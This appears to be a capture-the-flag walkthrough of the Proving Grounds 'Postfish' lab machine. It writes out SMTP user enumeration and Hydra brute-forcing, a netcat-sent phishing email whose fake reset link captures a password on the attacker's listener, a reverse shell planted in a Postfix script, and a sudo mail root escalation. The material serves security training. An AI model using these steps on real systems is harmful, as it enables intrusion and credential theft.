Pentest Everything
Search…
Postfish
Pg Practice Postfish writeup

Nmap

1
sudo nmap 192.168.211.137 -p- -sS -sV -Pn
2
​
3
PORT STATE SERVICE VERSION
4
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5
25/tcp open smtp Postfix smtpd
6
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
7
110/tcp open pop3 Dovecot pop3d
8
143/tcp open imap Dovecot imapd (Ubuntu)
9
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
10
995/tcp open ssl/pop3 Dovecot pop3d
11
Service Info: Host: postfish.off; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Copied!
Heading straight into SMTP I ran smtp-user-enum.pl with the syntax below:
1
sudo perl smtp-user-enum.pl -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.211.137
Copied!
Looks like we have some non default emails shown above that are listed below:
1
hr
2
sales
Copied!
Checking our port 80 from here we find the web page attempts to direct us to http://postfish.off. We can add the IP and domain name into /etc/hosts to get this working. Once completed the web pages should load correctly.
Checking out the link for 'Our Team' shows further departments and users.
We can run the users against smtp-user-enum to try and identify further usernames. Companies generally use naming conventions so we will either try and guess it or use a tool to help us identify.
We can then run the script against each user and this will generate variations of the username.
1
python2 exploit.py -n 'USER'
Copied!
Repeat for each user and save the results into a text file. We can then run the variations against smtp-user-enum again.
1
perl smtp-user-enum.pl -M VRFY -U /home/kali/Desktop/known-users -t 192.168.211.137
Copied!
At this point I tried to bruteforce the various accounts we have over IMAP and POP3. I was able to get a valid result with Hydra for sales:sales.
The password list was generated with cewl from the http://postfish.off/team.html web page.
1
cewl -d 5 -m 3 http://postfish.off/team.html -w /home/kali/Desktop/cewl.txt
Copied!
I then run our known users names with the output generated from cewl against Hydra.
I then logged into the sales account with telnet on port 110 for POP3 and was able to retrieve a singular email message.
The email indicates the IT team ([email protected]) will be sending password reset links to the sales team. From here we can potentially spear phish someone. Looking at http://postfish.off/team.html again shows that Brian Moore is the sales manager. We already know his email address from earlier as well from our smtp enumeration.
First set up a netcat listener on port 80.
1
sudo nc -lvp 80
Copied!
Next connect to SMTP using netcat then do the following to compose an email from [email protected] to [email protected]
1
nc -v postfish.off 25
Copied!
1
helo test
2
4
DATA
5
​
6
Subject: Password reset process
7
​
8
Hi Brian,
9
​
10
Please follow this link to reset your password: http://192.168.49.211/
11
​
12
Regards,
13
​
14
.
15
​
16
QUIT
Copied!
After a short while Brian will send us details regarding his current login to our netcat listener.
We now have the password EternaLSunshinE We can then login to SSH.
Copied!
I then transferred linpeas over to the target machine. After running we identify being a member of the 'filter' group which is a non default group. We also find /etc/postfix/disclaimer as being of interest.
A Google search on 'postfix disclaimer' results in the following being the first result on Google: https://www.howtoforge.com/how-to-automatically-add-a-disclaimer-to-outgoing-emails-with-altermime-postfix-on-debian-squeeze.
Looking through this it seems the admin on the box has followed the included steps to install and configure alterMIME to get disclaimers appended to emails.
Reading through the article essentially we see that for any emails included in the file /etc/postfix/disclaimer_addresses. When any of these addresses send or recieve an email the following file gets executed /etc/postfix/disclaimer. The file takes the contents of /etc/postfix/disclaimer.txt and appends it to the emails.
As we are a member the group 'filter' we can edit the script /etc/postfix/disclaimer. Using nano to edit the script I inserted a bash reverse shell to the top of the script.
Then like we did earlier I connected to SMTP with netcat and sent an email to trigger the shell.
1
helo test
2
4
DATA
5
​
6
Shell please
7
​
8
.
9
​
10
QUIT
Copied!
After doing so we should receive a shell.
From here I checked sudo permissions with sudo -l and found that we can run the mail binary as any user without a password.
Referring to GTFOBins we can use this to gain a root shell.
1
sudo mail --exec='!/bin/bash'
Copied!
We then gain a root shell.

Found this page helpful?

If you found this page helpful to you, please rate below as per the feedback options. For any corrections or general communications, please see the root page Pentest Everything for contact information.
Last modified 2mo ago